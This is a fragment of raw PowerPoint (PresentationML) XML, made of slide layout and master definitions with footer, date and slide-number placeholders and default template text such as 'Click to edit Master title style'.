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1.xml" ContentType="application/vnd.openxmlformats-officedocument.customXmlProperties+xml"/>
  <Override PartName="/customXml/item2.xml" ContentType="application/xml"/>
  <Override PartName="/customXml/_rels/item1.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/customXml/_rels/item2.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/customXml/_rels/item3.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1816F651-2361-4439-8B1A-CAAC502C7831}"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7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:t>Footer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="28"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{093D9D58-9326-4DE4-B8AE-C1C4F0353977}" type="slidenum">
              <a:t>&lt;#&gt;</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="26"/>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0"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:t>Footer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="31"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{B12D7C2E-A512-4C4F-AC7F-97353C34FA53}" type="slidenum">
              <a:t>&lt;#&gt;</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="29"/>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CB38440F-C57C-4C12-A06A-E9CF3EB27A2B}"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E67315DA-25CC-4C66-9445-F3E66E843D73}" type="slidenum">
              <a:t>&lt;#&gt;</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="7"/>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4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4" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="10"/>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2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:t>Footer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{5C7086B1-CA32-447E-8D5D-F5F3134F77F7}" type="slidenum">
              <a:t>&lt;#&gt;</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="1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6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6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5" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:t>Footer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="PlaceHolder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{E056FEAA-C50F-4999-B0AE-F57DE52DDF23}" type="slidenum">
              <a:t>&lt;#&gt;</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="PlaceHolder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="14"/>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8"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:t>Footer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="19"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{C72914D0-CF50-4E74-95FE-016F1B4C7B31}" type="slidenum">
              <a:t>&lt;#&gt;</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="17"/>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3" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" idx="21"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:t>Footer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="22"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{AD9A20BD-0ACA-46A6-A8EB-41DA1E34F581}" type="slidenum">
              <a:t>&lt;#&gt;</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="20"/>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4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:t>Footer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="25"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{78FB5D6E-6CD0-4918-97C4-F3F92063ED2A}" type="slidenum">
              <a:t>&lt;#&gt;</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="2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png"/><Relationship Id="rId3"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png"/><Relationship Id="rId3"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png"/><Relationship Id="rId3"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png"/><Relationship Id="rId3"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png"/><Relationship Id="rId3"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png"/><Relationship Id="rId3"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2"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pic>
        <p:nvPicPr>
          <p:cNvPr id="3"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4" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="446400" y="3085920"/>
            <a:ext cx="11298600" cy="33379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5" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581040" y="1020600"/>
            <a:ext cx="10993320" cy="1474560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" rIns="91440" tIns="45720" bIns="45720" anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="3600" spc="-1" strike="noStrike" cap="all">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Demi"/>
              </a:rPr>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="1"/>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IN" sz="900" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" idx="2"/>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8" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="3"/>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B7D6448F-2694-41F2-B493-73DED7B36843}" type="slidenum">
              <a:rPr b="0" lang="en-US" sz="900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>&lt;number&gt;</a:t>
            </a:fld>
            <a:endParaRPr b="0" lang="en-IN" sz="900" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="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10000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1417"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1700" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Click to edit the outline text format</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1700" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>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chemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Second Outline Level</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1300" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="1296000" indent="-288000">
              <a:spcBef>
                <a:spcPts val="850"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Third Outline Level</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="3" marL="1728000" indent="-216000">
              <a:spcBef>
                <a:spcPts val="567"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="75000"/>
              <a:buFont typeface="Symbol" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Fourth Outline Level</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>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chemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Fifth Outline Level</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>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chemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Sixth Outline Level</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>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chemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Seventh Outline Level</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>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5"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96"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97"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pic>
        <p:nvPicPr>
          <p:cNvPr id="98"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99" name="Rectangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="447840" y="601200"/>
            <a:ext cx="3682440" cy="58150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00" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="767880" y="933480"/>
            <a:ext cx="3031560" cy="1721880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" rIns="91440" tIns="45720" bIns="45720" anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike" cap="all">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Demi"/>
              </a:rPr>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4901040" y="1179720"/>
            <a:ext cx="6650640" cy="4657680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" rIns="91440" tIns="45720" bIns="45720" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="306000" indent="-306000" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1cade4"/>
              </a:buClr>
              <a:buSzPct val="92000"/>
              <a:buFont typeface="Wingdings 2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="630000" indent="-306000" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1cade4"/>
              </a:buClr>
              <a:buSzPct val="92000"/>
              <a:buFont typeface="Wingdings 2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Second level</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="900000" indent="-270000" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="320"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1cade4"/>
              </a:buClr>
              <a:buSzPct val="92000"/>
              <a:buFont typeface="Wingdings 2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Third level</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="3" marL="1242000" indent="-234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2"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Fourth level</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="4" marL="1602000" indent="-234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2"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Fifth level</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="102" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="767880" y="2836800"/>
            <a:ext cx="3031560" cy="3000960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" rIns="91440" tIns="45720" bIns="45720" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="320"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="103" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="26"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7606080" y="645696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IN" sz="900" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104" name="PlaceHolder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" idx="27"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581040" y="6452640"/>
            <a:ext cx="6916680" cy="364680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="4500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05" name="PlaceHolder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="28"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10558440" y="645696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98109AF7-E35C-49D9-9AF8-A0632BD4B98C}" type="slidenum">
              <a:rPr b="0" lang="en-US" sz="900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>&lt;number&gt;</a:t>
            </a:fld>
            <a:endParaRPr b="0" lang="en-IN"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6"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07"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108"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pic>
        <p:nvPicPr>
          <p:cNvPr id="109"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110" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581040" y="4693320"/>
            <a:ext cx="11029320" cy="566280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" rIns="91440" tIns="45720" bIns="45720" anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike" cap="all">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Demi"/>
              </a:rPr>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="111" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
